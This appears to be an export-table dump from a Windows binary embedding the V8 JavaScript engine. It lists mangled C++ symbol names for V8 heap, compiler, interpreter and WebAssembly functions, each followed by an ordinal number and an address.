                                  ?CollectAllGarbage@Heap@internal@v8@@QEAAXHW4GarbageCollectionReason@23@W4GCCallbackFlags@3@@Z38400x14092abe0
                                  ?CollectArrayAndObjectPrototypes@JSHeapBroker@compiler@internal@v8@@AEAAXXZ38410x140ddb330
                                  ?CollectBestEffort@Coverage@debug@v8@@SA?AV123@PEAVIsolate@3@@Z38420x140a7d540
                                  ?CollectControlProjections@NodeProperties@compiler@internal@v8@@SAXPEAVNode@234@PEAPEAV5234@_K@Z38430x140e43e40
                                  ?CollectDeoptInfo@ProfileNode@internal@v8@@QEAAXPEAVCodeEntry@23@@Z38440x1406d5200
                                  ?CollectGarbage@Heap@internal@v8@@QEAA_NW4AllocationSpace@23@W4GarbageCollectionReason@23@W4GCCallbackFlags@3@@Z38450x14092ae00
                                  ?CollectKeysTo@?$BaseNameDictionary@VGlobalDictionary@internal@v8@@VGlobalDictionaryShape@23@@internal@v8@@SA?AW4ExceptionStatus@23@V?$Handle@VGlobalDictionary@internal@v8@@@23@PEAVKeyAccumulator@23@@Z38460x140770320
                                  ?CollectKeysTo@?$BaseNameDictionary@VNameDictionary@internal@v8@@VNameDictionaryShape@23@@internal@v8@@SA?AW4ExceptionStatus@23@V?$Handle@VNameDictionary@internal@v8@@@23@PEAVKeyAccumulator@23@@Z38470x1407705e0
                                  ?CollectNonLocals@DeclarationScope@internal@v8@@QEAA?AV?$Handle@VStringSet@internal@v8@@@23@PEAVIsolate@23@V423@@Z38480x140a53870
                                  ?CollectNonLocals@Scope@internal@v8@@AEAAXPEAVDeclarationScope@23@PEAVIsolate@23@PEAV?$Handle@VStringSet@internal@v8@@@23@@Z38490x140a538b0
                                  ?CollectPrecise@Coverage@debug@v8@@SA?AV123@PEAVIsolate@3@@Z38500x140a7d5b0
                                  ?CollectSample@CpuProfiler@internal@v8@@QEAAXXZ38510x1406e76f0
                                  ?CollectSample@CpuProfiler@internal@v8@@SAXPEAVIsolate@23@@Z38520x1406e7710
                                  ?CollectSample@CpuProfiler@v8@@SAXPEAVIsolate@2@@Z38530x140a7d8a0
                                  ?CollectSourcePositions@Compiler@internal@v8@@SA_NPEAVIsolate@23@V?$Handle@VSharedFunctionInfo@internal@v8@@@23@@Z38540x1409ee460
                                  ?CollectSourcePositionsForAllBytecodeArrays@Isolate@internal@v8@@QEAAXXZ38550x14097bdf0
                                  ?CollectTypeProfile@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAAEAV1234@H@Z38560x140891220
                                  ?CollectValueProjections@NodeProperties@compiler@internal@v8@@SAXPEAVNode@234@PEAPEAV5234@_K@Z38570x140e43f80
                                  ?ColumnOffset@Script@debug@v8@@QEBAHXZ38580x14041c420
                                  ?CombineSpeedsInBytesPerMillisecond@GCTracer@internal@v8@@SANNN@Z38590x14093f9c0
                                  ?CombineSurrogatePair@Scanner@internal@v8@@AEAA_NXZ38600x140422000
                                  ?CombinedMarkCompactSpeedInBytesPerMillisecond@GCTracer@internal@v8@@QEAANXZ38610x14093f9e0
                                  ?Comment@CodeAssembler@compiler@internal@v8@@QEAAXPEBD@Z38620x1409e9970
                                  ?Comment@CodeAssembler@compiler@internal@v8@@QEAAXV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z38630x140e6b930
                                  ?Comment@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@PEBD@Z38640x140e0ec30
                                  ?Comment@RawMachineAssembler@compiler@internal@v8@@QEAAXAEBV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z38650x140ee1a50
                                  ?Commit@CompilationDependencies@compiler@internal@v8@@QEAA_NV?$Handle@VCode@internal@v8@@@34@@Z38660x140f0e920
                                  ?Commit@WasmCodeManager@wasm@internal@v8@@AEAA_NVAddressRegion@base@4@@Z38670x14056ef90
                                  ?CommitFromSpaceIfNeeded@NewSpace@internal@v8@@QEAA_NXZ38680x1404220e0
                                  ?CommitPageSize@BoundedPageAllocator@base@v8@@UEAA_KXZ38690x140076c30
                                  ?CommitPageSize@OS@base@v8@@CA_KXZ38700x140dc0670
                                  ?CommitPageSize@PageAllocator@base@v8@@UEAA_KXZ38710x140076c20
                                  ?CommitPageSize@internal@v8@@YA_KXZ38720x1405f4020
                                  ?CommitPagesForIsolate@IsolateAllocator@internal@v8@@AEAAX_K@Z38730x14089bba0
                                  ?CommitReservedEntry@ConstantArrayBuilder@interpreter@internal@v8@@QEAA_KW4OperandSize@234@VSmi@34@@Z38740x14086e020
                                  ?CommitSpillMoves@TopLevelLiveRange@compiler@internal@v8@@QEAAXPEAVRegisterAllocationData@234@AEBVInstructionOperand@234@_N@Z38750x140ef3b90
                                  ?CommittedMemory@NewSpace@internal@v8@@UEAA_KXZ38760x140422100
                                  ?CommittedMemory@Space@internal@v8@@UEAA_KXZ38770x14041aca0
                                  ?CommittedPhysicalMemory@LargeObjectSpace@internal@v8@@UEAA_KXZ38780x1405f40c0
                                  ?CommittedPhysicalMemory@MemoryChunk@internal@v8@@QEAA_KXZ38790x1408d1d00
                                  ?CommittedPhysicalMemory@NewSpace@internal@v8@@UEAA_KXZ38800x1408d1d40
                                  ?CommittedPhysicalMemory@PagedSpace@internal@v8@@UEAA_KXZ38810x1408d1df0
                                  ?Compact@OSROptimizedCodeCache@internal@v8@@SAXV?$Handle@VNativeContext@internal@v8@@@23@@Z38820x14075b9e0
                                  ?Compact@PrototypeUsers@internal@v8@@SA?AVWeakArrayList@23@V?$Handle@VWeakArrayList@internal@v8@@@23@PEAVHeap@23@P6AXVHeapObject@23@HH@ZW4AllocationType@23@@Z38830x1407708a0
                                  ?Compact@WeakArrayList@internal@v8@@QEAAXPEAVIsolate@23@@Z38840x140770b50
                                  ?CompactWeakArrayList@Factory@internal@v8@@QEAA?AV?$Handle@VWeakArrayList@internal@v8@@@23@V423@HW4AllocationType@23@@Z38850x140944710
                                  ?CompactionSpeedInBytesPerMillisecond@GCTracer@internal@v8@@QEBANXZ38860x14093fa90
                                  ?Compare@Bignum@internal@v8@@SAHAEBV123@0@Z38870x1408485a0
                                  ?Compare@InstructionOperand@compiler@internal@v8@@QEBA_NAEBV1234@@Z38880x140453580
                                  ?Compare@Object@internal@v8@@SA?AV?$Maybe@W4ComparisonResult@internal@v8@@@3@PEAVIsolate@23@V?$Handle@VObject@internal@v8@@@23@1@Z38890x140770c70
                                  ?CompareCanonicalized@InstructionOperand@compiler@internal@v8@@QEBA_NAEBV1234@@Z38900x140453590
                                  ?CompareExchangeStatus@Cancelable@internal@v8@@AEAA_NW4Status@123@0PEAW44123@@Z38910x140422140
                                  ?CompareMaps@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@V?$ZoneHandleSet@VMap@internal@v8@@@34@@Z38920x140ebe3d0
                                  ?CompareNil@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAAEAV1234@W4Value@Token@34@W4NilValue@1234@@Z38930x140891370
                                  ?CompareNull@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAAEAV1234@XZ38940x140891390
                                  ?CompareOperation@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAAEAV1234@W4Value@Token@34@VRegister@234@H@Z38950x1408914c0
                                  ?CompareReference@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAAEAV1234@VRegister@234@@Z38960x140891f20
                                  ?CompareRoot@TurboAssembler@internal@v8@@QEAAXVOperand@23@W4RootIndex@23@@Z38970x140498bc0
                                  ?CompareRoot@TurboAssembler@internal@v8@@QEAAXVRegister@23@W4RootIndex@23@@Z38980x140498c30
                                  ?CompareStrings@LiveEdit@internal@v8@@SAXPEAVIsolate@23@V?$Handle@VString@internal@v8@@@23@1PEAV?$vector@USourceChangeRange@internal@v8@@V?$allocator@USourceChangeRange@internal@v8@@@std@@@std@@@Z38990x1409b9ad0
                                  ?CompareToDouble@BigInt@internal@v8@@SA?AW4ComparisonResult@23@V?$Handle@VBigInt@internal@v8@@@23@N@Z39000x14083ac10
                                  ?CompareTypeOf@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAAEAV1234@W4LiteralFlag@TestTypeOfFlags@234@@Z39010x1408920c0
                                  ?CompareUndefined@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAAEAV1234@XZ39020x140892210
                                  ?CompareUndetectable@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAAEAV1234@XZ39030x140892340
                                  ?Compile@Compiler@internal@v8@@SA_NV?$Handle@VJSFunction@internal@v8@@@23@W4ClearExceptionFlag@123@PEAVIsCompiledScope@23@@Z39040x1409eea20
                                  ?Compile@Compiler@internal@v8@@SA_NV?$Handle@VSharedFunctionInfo@internal@v8@@@23@W4ClearExceptionFlag@123@PEAVIsCompiledScope@23@@Z39050x1409eecd0
                                  ?Compile@Script@v8@@SA?AV?$MaybeLocal@VScript@v8@@@2@V?$Local@VContext@v8@@@2@V?$Local@VString@v8@@@2@PEAVScriptOrigin@2@@Z39060x140a7d8c0
                                  ?Compile@ScriptCompiler@v8@@SA?AV?$MaybeLocal@VScript@v8@@@2@V?$Local@VContext@v8@@@2@PEAVSource@12@W4CompileOptions@12@W4NoCacheReason@12@@Z39070x140a7d950
                                  ?Compile@ScriptCompiler@v8@@SA?AV?$MaybeLocal@VScript@v8@@@2@V?$Local@VContext@v8@@@2@PEAVStreamedSource@12@V?$Local@VString@v8@@@2@AEBVScriptOrigin@2@@Z39080x140a7da50
                                  ?CompileError@ErrorThrower@wasm@internal@v8@@QEAAXPEBDZZ39090x14051b780
                                  ?CompileError_string@Factory@internal@v8@@QEAA?AV?$Handle@VString@internal@v8@@@23@XZ39100x140422160
                                  ?CompileError_string@OffThreadFactory@internal@v8@@QEAA?AV?$Handle@VString@internal@v8@@@23@XZ39110x140727670
                                  ?CompileFailed@ErrorThrower@wasm@internal@v8@@QEAAXAEBVWasmError@234@@Z39120x140519fb0
                                  ?CompileForLiveEdit@Compiler@internal@v8@@SA?AV?$MaybeHandle@VSharedFunctionInfo@internal@v8@@@23@PEAVParseInfo@23@V?$Handle@VScript@internal@v8@@@23@PEAVIsolate@23@@Z39130x1409ef430
                                  ?CompileForTesting@RegExp@internal@v8@@SA_NPEAVIsolate@23@PEAVZone@23@PEAURegExpCompileData@23@V?$Flags@W4Flag@JSRegExp@internal@v8@@H@base@3@V?$Handle@VString@internal@v8@@@23@4_N@Z39140x1406a52a0
                                  ?CompileFunction@WasmEngine@wasm@internal@v8@@QEAAXPEAVIsolate@34@PEAVNativeModule@234@IW4ExecutionTier@234@@Z39150x14055d810
                                  ?CompileFunctionInContext@ScriptCompiler@v8@@SA?AV?$MaybeLocal@VFunction@v8@@@2@V?$Local@VContext@v8@@@2@PEAVSource@12@_KQEAV?$Local@VString@v8@@@2@2QEAV?$Local@VObject@v8@@@2@W4CompileOptions@12@W4NoCacheReason@12@PEAV?$Local@VScriptOrModule@v8@@@2@@Z39160x140a7dff0
                                  ?CompileImportWrapper@wasm@internal@v8@@YAPEAVWasmCode@123@PEAVWasmEngine@123@PEAVNativeModule@123@PEAVCounters@23@W4WasmImportCallKind@compiler@23@PEBV?$Signature@VValueType@wasm@internal@v8@@@23@PEAVModificationScope@WasmImportWrapperCache@123@@Z39170x140591420
                                  ?CompileJSToWasmWrapper@JSToWasmWrapperCompilationUnit@wasm@internal@v8@@SA?AV?$Handle@VCode@internal@v8@@@34@PEAVIsolate@34@PEBV?$Signature@VValueType@wasm@internal@v8@@@34@_N@Z39180x1405ae730
                                  ?CompileJsToWasmWrappers@wasm@internal@v8@@YAXPEAVIsolate@23@PEBUWasmModule@123@PEAV?$Handle@VFixedArray@internal@v8@@@23@@Z39190x140591610
                                  ?CompileModule@ScriptCompiler@v8@@SA?AV?$MaybeLocal@VModule@v8@@@2@PEAVIsolate@2@PEAVSource@12@W4CompileOptions@12@W4NoCacheReason@12@@Z39200x140a7ed60
                                  ?CompileNext@OptimizingCompileDispatcher@internal@v8@@AEAAXPEAVOptimizedCompilationJob@23@PEAVRuntimeCallStats@23@@Z39210x1409d4550
                                  ?CompileOptimized@Compiler@internal@v8@@SA_NV?$Handle@VJSFunction@internal@v8@@@23@W4ConcurrencyMode@23@@Z39220x1409ef6f0
                                  ?CompileUnboundInternal@ScriptCompiler@v8@@CA?AV?$MaybeLocal@VUnboundScript@v8@@@2@PEAVIsolate@2@PEAVSource@12@W4CompileOptions@12@W4NoCacheReason@12@@Z39230x140a7ee70
                                  ?CompileUnboundScript@ScriptCompiler@v8@@SA?AV?$MaybeLocal@VUnboundScript@v8@@@2@PEAVIsolate@2@PEAVSource@12@W4CompileOptions@12@W4NoCacheReason@12@@Z39240x140a7f570
                                  ?CompileWasmFunction@WasmCompilationUnit@wasm@internal@v8@@SAXPEAVIsolate@34@PEAVNativeModule@234@PEAVWasmFeatures@234@PEBUWasmFunction@234@W4ExecutionTier@234@@Z39250x1405ae7f0
                                  ?CompileWasmImportCallWrapper@compiler@internal@v8@@YA?AUWasmCompilationResult@wasm@23@PEAVWasmEngine@523@PEAUCompilationEnv@523@W4WasmImportCallKind@123@PEBV?$Signature@VValueType@wasm@internal@v8@@@23@_N@Z39260x140e5ac70
                                  ?CompleteInobjectSlackTracking@Map@internal@v8@@QEAAXPEAVIsolate@23@@Z39270x14078f990
                                  ?Compress@SnapshotCompression@internal@v8@@SA?AVSnapshotData@23@PEBV423@@Z39280x1406033e0
                                  ?CompressBlock@MoveOptimizer@compiler@internal@v8@@AEAAXPEAVInstructionBlock@234@@Z39290x140ee7f80
                                  ?CompressGaps@MoveOptimizer@compiler@internal@v8@@AEAAXPEAVInstruction@234@@Z39300x140ee8070
                                  ?CompressMoves@MoveOptimizer@compiler@internal@v8@@AEAAXPEAVParallelMove@234@PEAV?$ZoneVector@PEAVMoveOperands@compiler@internal@v8@@@34@@Z39310x140ee8150
                                  ?CompressedHeapConstant@CommonOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@AEBV?$Handle@VHeapObject@internal@v8@@@34@@Z39320x140e09870
                                  ?Compute@GCIdleTimeHandler@internal@v8@@QEAA?AW4GCIdleTimeAction@23@NVGCIdleTimeHeapState@23@@Z39330x140943160
                                  ?ComputeAndSetHash@String@internal@v8@@AEAAIXZ39340x140747e90
                                  ?ComputeAssemblyOrder@InstructionSequence@compiler@internal@v8@@AEAAXXZ39350x140e045c0
                                  ?ComputeBranchInfo@CodeGenerator@compiler@internal@v8@@AEAA?AVRpoNumber@234@PEAUBranchInfo@234@PEAVInstruction@234@@Z39360x140e4a170
                                  ?ComputeCallFrequency@FeedbackNexus@internal@v8@@QEAAMXZ39370x1407f5a30
                                  ?ComputeCapacity@HashTableBase@internal@v8@@SAHH@Z39380x140422170
                                  ?ComputeCodeStartAddress@TurboAssembler@internal@v8@@QEAAXVRegister@23@@Z39390x140498cc0
                                  ?ComputeConfiguration@LookupIterator@internal@v8@@CA?AW4Configuration@123@PEAVIsolate@23@W44123@V?$Handle@VName@internal@v8@@@23@@Z39400x140422190
                                  ?ComputeControlTransfersForTesting@WasmInterpreter@wasm@internal@v8@@SA?AV?$ZoneMap@_KUControlTransferEntry@wasm@internal@v8@@U?$less@_K@std@@@34@PEAVZone@34@PEBUWasmModule@234@PEBE2@Z39410x140543290
                                  ?ComputeDiscardMemoryArea@MemoryAllocator@internal@v8@@SA?AVAddressRegion@base@3@_K0@Z39420x1408d1f20
                                  ?ComputeForwarding@JumpThreading@compiler@internal@v8@@SA_NPEAVZone@34@PEAV?$ZoneVector@VRpoNumber@compiler@internal@v8@@@34@PEAVInstructionSequence@234@_N@Z39430x140ee6910
                                  ?ComputeIncoming@Linkage@compiler@internal@v8@@SAPEAVCallDescriptor@234@PEAVZone@34@PEAVOptimizedCompilationInfo@34@@Z39440x140e67520
                                  ?ComputeLocation@Isolate@internal@v8@@QEAA_NPEAVMessageLocation@23@@Z39450x14097c010
                                  ?ComputeLocationFromException@Isolate@internal@v8@@QEAA_NPEAVMessageLocation@23@V?$Handle@VObject@internal@v8@@@23@@Z39460x14097c240
                                  ?ComputeLocationFromStackTrace@Isolate@internal@v8@@QEAA_NPEAVMessageLocation@23@V?$Handle@VObject@internal@v8@@@23@@Z39470x14097c450
                                  ?ComputeLoopState@CsaLoadElimination@compiler@internal@v8@@AEBAPEBVAbstractState@1234@PEAVNode@234@PEBV51234@@Z39480x140f124e0
                                  ?ComputeLoopState@LoadElimination@compiler@internal@v8@@AEBAPEBVAbstractState@1234@PEAVNode@234@PEBV51234@@Z39490x140f987b0
                                  ?ComputeLoopStateForStoreField@LoadElimination@compiler@internal@v8@@AEBAPEBVAbstractState@1234@PEAVNode@234@PEBV51234@AEBUFieldAccess@234@@Z39500x140f99510
                                  ?ComputeSamplingInterval@CpuProfiler@internal@v8@@AEBA?AVTimeDelta@base@3@XZ39510x1406e77a0
                                  ?ComputeSchedule@Scheduler@compiler@internal@v8@@SAPEAVSchedule@234@PEAVZone@34@PEAVGraph@234@V?$Flags@W4Flag@Scheduler@compiler@internal@v8@@H@base@4@PEAVTickCounter@34@@Z39520x140fb6a50
                                  ?ComputeSpecialRPO@Scheduler@compiler@internal@v8@@SAPEAV?$ZoneVector@PEAVBasicBlock@compiler@internal@v8@@@34@PEAVZone@34@PEAVSchedule@234@@Z39530x140fb6c10
                                  ?ComputeSpecialRPONumbering@Scheduler@compiler@internal@v8@@AEAAXXZ39540x140fb6d70
                                  ?ComputeStepSizeInBytes@IncrementalMarking@internal@v8@@AEAA_KW4StepOrigin@23@@Z39550x140920a60
                                  ?Concat@String@v8@@SA?AV?$Local@VString@v8@@@2@PEAVIsolate@2@V32@1@Z39560x140a7f630
                                  ?ConcatenateBytes@WasmCode@wasm@internal@v8@@AEAA?AV?$unique_ptr@$$BY0A@$$CBEU?$default_delete@$$BY0A@$$CBE@std@@@std@@V?$initializer_list@V?$Vector@$$CBE@internal@v8@@@6@@Z39570x14056f050
                                  ?ConfigureCloneObject@FeedbackNexus@internal@v8@@QEAAXV?$Handle@VMap@internal@v8@@@23@0@Z39580x1407f5ab0
                                  ?ConfigureDefaults@ResourceConstraints@v8@@QEAAX_K0@Z39590x140a7f760
                                  ?ConfigureDefaultsFromHeapSize@ResourceConstraints@v8@@QEAAX_K0@Z39600x140a7f7c0
                                  ?ConfigureFlags@OptimizedCompilationInfo@internal@v8@@AEAAXXZ39610x1409dca50
                                  ?ConfigureHandlerMode@FeedbackNexus@internal@v8@@QEAAXAEBVMaybeObjectHandle@23@@Z39620x1407f61a0
                                  ?ConfigureLexicalVarMode@FeedbackNexus@internal@v8@@QEAA_NHH_N@Z39630x1407f62c0
                                  ?ConfigureMegamorphic@FeedbackNexus@internal@v8@@QEAA_NW4IcCheckType@23@@Z39640x1407f6350
                                  ?ConfigureMegamorphic@FeedbackNexus@internal@v8@@QEAA_NXZ39650x1407f6430
                                  ?ConfigureMonomorphic@FeedbackNexus@internal@v8@@QEAAXV?$Handle@VName@internal@v8@@@23@V?$Handle@VMap@internal@v8@@@23@AEBVMaybeObjectHandle@23@@Z39660x1407f64d0
                                  ?ConfigurePolymorphic@FeedbackNexus@internal@v8@@QEAAXV?$Handle@VName@internal@v8@@@23@AEBV?$vector@U?$pair@V?$Handle@VMap@internal@v8@@@internal@v8@@VMaybeObjectHandle@23@@std@@V?$allocator@U?$pair@V?$Handle@VMap@internal@v8@@@internal@v8@@VMaybeObjectHandle@23@@std@@@2@@std@@@Z39670x1407f6860
                                  ?ConfigurePropertyCellMode@FeedbackNexus@internal@v8@@QEAAXV?$Handle@VPropertyCell@internal@v8@@@23@@Z39680x1407f6ae0
                                  ?ConfigureUninitialized@FeedbackNexus@internal@v8@@QEAAXXZ39690x1407f6c10
                                  ?ConnectUnreachableToEnd@GraphAssembler@compiler@internal@v8@@QEAAXXZ39700x140ec3d50
                                  ?Constant@JSGraph@compiler@internal@v8@@QEAAPEAVNode@234@AEBVObjectRef@234@@Z39710x140ea6a90
                                  ?Constant@JSGraph@compiler@internal@v8@@QEAAPEAVNode@234@N@Z39720x140ea6c00
                                  ?Constant@JSGraphAssembler@compiler@internal@v8@@QEAA?AV?$TNode@VObject@internal@v8@@@34@AEBVObjectRef@234@@Z39730x140ec3ee0
                                  ?Constant@Type@compiler@internal@v8@@SA?AV1234@NPEAVZone@34@@Z39740x140e2ed90
                                  ?Constant@Type@compiler@internal@v8@@SA?AV1234@PEAVJSHeapBroker@234@V?$Handle@VObject@internal@v8@@@34@PEAVZone@34@@Z39750x140e2ee60
                                  ?ConstantPoolEntryFor@BytecodeJumpTable@interpreter@internal@v8@@QEAA_KH@Z39760x14087ae90
                                  ?Construct@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAAEAV1234@VRegister@234@VRegisterList@234@H@Z39770x140892470
                                  ?Construct@CodeFactory@internal@v8@@SA?AVCallable@23@PEAVIsolate@23@@Z39780x1409f9400
                                  ?Construct@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@IAEBVCallFrequency@234@AEBUFeedbackSource@234@@Z39790x140eac510
                                  ?ConstructForwardVarargs@CodeFactory@internal@v8@@SA?AVCallable@23@PEAVIsolate@23@@Z39800x1409f9420
                                  ?ConstructForwardVarargs@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@_KI@Z39810x140eac5f0
                                  ?ConstructFunction@CodeFactory@internal@v8@@SA?AVCallable@23@PEAVIsolate@23@@Z39820x1409f9440
                                  ?ConstructFunctionForwardVarargs@CodeFactory@internal@v8@@SA?AVCallable@23@PEAVIsolate@23@@Z39830x1409f9460
                                  ?ConstructVarargs@CodeFactory@internal@v8@@SA?AVCallable@23@PEAVIsolate@23@@Z39840x1409f9480
                                  ?ConstructWithArrayLike@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@AEBVCallFrequency@234@@Z39850x140eac6b0
                                  ?ConstructWithSpread@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAAEAV1234@VRegister@234@VRegisterList@234@H@Z39860x140892530
                                  ?ConstructWithSpread@CodeFactory@internal@v8@@SA?AVCallable@23@PEAVIsolate@23@@Z39870x1409f94a0
                                  ?ConstructWithSpread@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@IAEBVCallFrequency@234@AEBUFeedbackSource@234@@Z39880x140eac780
                                  ?Consume@?$ParserBase@VParser@internal@v8@@@internal@v8@@IEAAXW4Value@Token@23@@Z39890x1406f9f80
                                  ?ConsumeCComment@AsmJsScanner@internal@v8@@AEAA_NXZ39900x140a66a30
                                  ?ConsumeCPPComment@AsmJsScanner@internal@v8@@AEAAXXZ39910x140a66b10
                                  ?ConsumeCompareOrShift@AsmJsScanner@internal@v8@@AEAAXH@Z39920x140a66b80
                                  ?ConsumeIdentifier@AsmJsScanner@internal@v8@@AEAAXH@Z39930x140a66d70
                                  ?ConsumeNumber@AsmJsScanner@internal@v8@@AEAAXH@Z39940x140a67070
                                  ?ConsumeString@AsmJsScanner@internal@v8@@AEAAXH@Z39950x140a67410
                                  ?Contains@ArrayBufferList@internal@v8@@QEAA_NPEAVArrayBufferExtension@23@@Z39960x140962480
                                  ?Contains@BitVector@internal@v8@@QEBA_NH@Z39970x140453630
                                  ?Contains@CodeObjectRegistry@internal@v8@@QEBA_N_K@Z39980x1408d2050
                                  ?Contains@Heap@internal@v8@@QEAA_NVHeapObject@23@@Z39990x14092ca40
                                  ?Contains@LargeObjectSpace@internal@v8@@QEAA_NVHeapObject@23@@Z40000x14041ad20
                                  ?Contains@NewSpace@internal@v8@@QEAA_NVHeapObject@23@@Z40010x14041acb0
                                  ?Contains@NewSpace@internal@v8@@QEAA_NVObject@23@@Z40020x14041acd0
                                  ?Contains@PagedSpace@internal@v8@@QEAA_NVObject@23@@Z40030x14041ad00
                                  ?Contains@PagedSpace@internal@v8@@QEAA_N_K@Z40040x14041ad20
                                  ?Contains@ReadOnlyHeap@internal@v8@@SA_NVHeapObject@23@@Z40050x1408e2e30
                                  ?Contains@ReadOnlyHeap@internal@v8@@SA_N_K@Z40060x1408e2e30
                                  ?Contains@Type@compiler@internal@v8@@CA_NPEBVRangeType@234@0@Z40070x140e2ef50
                                  ?ContainsAnyLocalHeap@GlobalSafepoint@internal@v8@@QEAA_NXZ40080x1408e2380
                                  ?ContainsAsmModule@Scope@internal@v8@@QEBA_NXZ40090x140a538e0
                                  ?ContainsCall@InstructionSequence@compiler@internal@v8@@QEBA_NXZ40100x140453680
                                  ?ContainsLabel@?$ParserBase@VParser@internal@v8@@@internal@v8@@IEAA_NPEBV?$ZoneList@PEBVAstRawString@internal@v8@@@23@PEBVAstRawString@23@@Z40110x1406f9f90
                                  ?ContainsLocal@BytecodeLoopAssignments@compiler@internal@v8@@QEBA_NH@Z40120x140ea0390
                                  ?ContainsLocalHeap@GlobalSafepoint@internal@v8@@QEAA_NPEAVLocalHeap@23@@Z40130x1408e23c0
                                  ?ContainsOnlyOneByte@String@v8@@QEBA_NXZ40140x140a7f880
                                  ?ContainsParameter@BytecodeLoopAssignments@compiler@internal@v8@@QEBA_NH@Z40150x140ea03e0
                                  ?ContainsSlow@LargeObjectSpace@internal@v8@@QEAA_N_K@Z40160x14091dc20
                                  ?ContainsSlow@NewSpace@internal@v8@@QEAA_N_K@Z40170x14041ad40
                                  ?ContainsSlow@PagedSpace@internal@v8@@QEAA_N_K@Z40180x1408d20f0
                                  ?Context@MarkingWorklists@internal@v8@@QEAA_KXZ40190x140076d70
                                  ?ContextAccessOf@compiler@internal@v8@@YAAEBVContextAccess@123@PEBVOperator@123@@Z40200x1402e6a30
                                  ?ContextChainLength@Scope@internal@v8@@QEBAHPEAV123@@Z40210x140a53940
                                  ?ContextChainLengthUntilOutermostSloppyEval@Scope@internal@v8@@QEBAHXZ40220x140a53970
                                  ?ContextDisposalRateInMilliseconds@GCTracer@internal@v8@@QEBANXZ40230x14093faa0
                                  ?ContextDisposedNotification@Isolate@v8@@QEAAH_N@Z40240x140a7f9c0
                                  ?ContextHeaderLength@Scope@internal@v8@@QEBAHXZ40250x140641110
                                  ?ContextId@Script@debug@v8@@QEBA?AV?$Maybe@H@3@XZ40260x140a7fac0
                                  ?ContextLocalCount@Scope@internal@v8@@QEBAHXZ40270x140a539b0
                                  ?ContextRegister@CallInterfaceDescriptor@internal@v8@@SA?BVRegister@23@XZ40280x140447a80
                                  ?Continuations@RawMachineAssembler@compiler@internal@v8@@QEAAXPEAVNode@234@PEAVRawMachineLabel@234@1@Z40290x140ee1c90
                                  ?Continue@ConsStringIterator@internal@v8@@AEAA?AVString@23@PEAH@Z40300x1407480f0
                                  ?Continue@LoopBuilder@interpreter@internal@v8@@QEAAXXZ40310x14086caf0
                                  ?ContinueIfNull@LoopBuilder@interpreter@internal@v8@@QEAAXXZ40320x14086cb20
                                  ?ContinueIfUndefined@LoopBuilder@interpreter@internal@v8@@QEAAXXZ40330x14086cb50
                                  ?ControlInputCount@Operator@compiler@internal@v8@@QEBAHXZ40340x140451620
                                  ?ControlOutputCount@Operator@compiler@internal@v8@@QEBAHXZ40350x14036ea40
                                  ?ConvertBinaryToNaryOperationSourceRange@Parser@internal@v8@@AEAAXPEAVBinaryOperation@23@PEAVNaryOperation@23@@Z40360x1406f9fc0
                                  ?ConvertPlainPrimitiveToNumber@TypedOptimization@compiler@internal@v8@@AEAAPEAVNode@234@PEAV5234@@Z40370x140fe0be0
                                  ?ConvertReceiver@OperationTyper@compiler@internal@v8@@QEAA?AVType@234@V5234@@Z40380x140ff9e30
                                  ?ConvertReceiver@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@W4ConvertReceiverMode@34@@Z40390x140ebe490
                                  ?ConvertTaggedHoleToUndefined@JSGraphAssembler@compiler@internal@v8@@QEAA?AV?$TNode@VObject@internal@v8@@@34@V534@@Z40400x140ec3f40
                                  ?ConvertTaggedHoleToUndefined@OperationTyper@compiler@internal@v8@@QEAA?AVType@234@V5234@@Z40410x140ff9f10
                                  ?ConvertTaggedHoleToUndefined@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ40420x140ebe4e0
                                  ?ConvertToIndex@Object@internal@v8@@CA?AV?$MaybeHandle@VObject@internal@v8@@@23@PEAVIsolate@23@V?$Handle@VObject@internal@v8@@@23@W4MessageTemplate@23@@Z40430x1407712e0
                                  ?ConvertToInteger@Object@internal@v8@@CA?AV?$MaybeHandle@VObject@internal@v8@@@23@PEAVIsolate@23@V?$Handle@VObject@internal@v8@@@23@@Z40440x140771590
                                  ?ConvertToKeysArray@OrderedHashSet@internal@v8@@SA?AV?$Handle@VFixedArray@internal@v8@@@23@PEAVIsolate@23@V?$Handle@VOrderedHashSet@internal@v8@@@23@W4GetKeysConversion@23@@Z40450x14075e050
                                  ?ConvertToLength@Object@internal@v8@@CA?AV?$MaybeHandle@VObject@internal@v8@@@23@PEAVIsolate@23@V?$Handle@VObject@internal@v8@@@23@@Z40460x140771630
                                  ?ConvertToString@Object@internal@v8@@CA?AV?$MaybeHandle@VString@internal@v8@@@23@PEAVIsolate@23@V?$Handle@VObject@internal@v8@@@23@@Z40470x140771c50
                                  ?ConvertUsesToOperand@LiveRange@compiler@internal@v8@@QEAAXAEBVInstructionOperand@234@0@Z40480x140ef5f60
                                  ?Copy@Buffer@node@@YA?AV?$MaybeLocal@VObject@v8@@@v8@@PEAVIsolate@4@PEBD_K@Z40490x1401da920
                                  ?Copy@RegExpBytecodeGenerator@internal@v8@@AEAAXPEAE@Z40500x1406c9f30
                                  ?CopyAndTenureFixedCOWArray@Factory@internal@v8@@QEAA?AV?$Handle@VFixedArray@internal@v8@@@23@V423@@Z40510x1409448e0
                                  ?CopyBytecodeArray@Factory@internal@v8@@QEAA?AV?$Handle@VBytecodeArray@internal@v8@@@23@V423@@Z40520x140944930
